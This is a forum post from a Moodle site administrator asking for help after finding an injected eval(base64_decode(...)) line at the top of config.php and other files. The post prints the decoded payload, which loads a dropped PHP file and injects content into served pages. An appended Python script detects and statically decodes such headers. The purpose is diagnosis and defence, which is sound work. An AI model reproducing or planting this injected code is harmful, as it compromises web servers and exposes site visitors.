Wow! Thanks for all the helpful responses on this Moodle problem that started several days ago. The Moodle community is amazing!
Sure enough, I found something that indicates the Moodle site has been hacked.
In the files config.php, install.php (and others) I found the following line at the very top:
<?php /**/eval(base64_decode('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')); ?>
Using the base64 decoder at <http://www.motobit.com/util/base64-decoder-encoder.asp>,
I found that this decodes to:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/electri1/public_html/uploaddata/6/moddata/assignment/81/415/mdl_utf.php')){include_once('/home/electri1/public_html/uploaddata/6/moddata/assignment/81/415/mdl_utf.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
So I think my moodle site has been hacked ! Ug !
I know I have been amiss in not upgrading from the current version of Moodle (1.5.2),
but I have been stuck for two reasons:
1. When I tried to upgrade two years ago using the Fantastico, it completely garbled the
MySQL database. Fortunately the webhost (SiteGround) was able to restore from
a recent backup. This caused me days of stress and frustration.
2. When I try to backup a course, Moodle prints a list of backup actions and then just
stops with "done" displayed on the bottom of the browser. Without a course backup
I cannot transfer it to a new installation.
3. Moodle 1.5.2 has been working well otherwise, until now.
It is still working except for the ability to edit courses. Whenever I click on an edit, move, or delete icon,
I get a blank page.
Should I just edit the line out of the PHP files?
How did the hacker gain access to these files to change them?
Thanks, Tim
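
A detection sketch for the injection described in the post above, added here as an example and not part of the original post: it walks a web root, finds every PHP file that begins with the `eval(base64_decode('...'))` header, and decodes the blob statically (nothing is executed) to list the second-stage files it includes, which also need to be located. The function names, the `/srv/demo/...` path and the sample files are constructed for the demonstration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Header shape from the post: <?php /**/eval(base64_decode('...')); ?>
INJECT_RE = re.compile(
    rb"<\?php\s*(?:/\*.*?\*/\s*)?eval\s*\(\s*base64_decode\s*\(\s*"
    rb"(['\"])([A-Za-z0-9+/=\s]*)\1\s*\)\s*\)\s*;\s*\?>", re.S)
# Files the decoded stage pulls in (include/require, with or without _once).
INCLUDE_RE = re.compile(rb"(?:include|require)(?:_once)?\s*\(\s*['\"]([^'\"]+)['\"]")


def scan_file(path):
    """Return a finding for a file that begins with the injected line, else None."""
    data = Path(path).read_bytes().lstrip(b"\xef\xbb\xbf\r\n\t ")
    m = INJECT_RE.match(data)
    if m is None:
        return None
    try:
        decoded = base64.b64decode(m.group(2))  # decode only, never eval
    except ValueError:  # binascii.Error: blob truncated or corrupted
        decoded = b""
    includes = sorted({p.decode("utf-8", "replace") for p in INCLUDE_RE.findall(decoded)})
    # header_bytes: length of the injected header, counted after any BOM/whitespace
    return {"file": str(path), "header_bytes": m.end(), "includes": includes}


def scan_tree(root):
    """Scan every *.php file under root; return findings sorted by path."""
    hits = (scan_file(p) for p in sorted(Path(root).rglob("*.php")))
    return [h for h in hits if h is not None]


def demo():
    """Build a constructed two-file tree (one injected, one clean) and scan it."""
    stage = b"if(file_exists('/srv/demo/moddata/x.php')){include_once('/srv/demo/moddata/x.php');}"
    header = b"<?php /**/eval(base64_decode('" + base64.b64encode(stage) + b"')); ?>"
    with tempfile.TemporaryDirectory() as d:
        Path(d, "config.php").write_bytes(header + b"<?php $CFG = new stdClass; ?>\n")
        Path(d, "clean.php").write_bytes(b"<?php echo 'ok'; ?>\n")
        return [(Path(f["file"]).name, f["includes"]) for f in scan_tree(d)]


if __name__ == "__main__":
    print(demo())
```

Run `scan_tree()` against a copy of the site files; every path reported under `includes` is a dropped file to preserve as evidence before any cleanup.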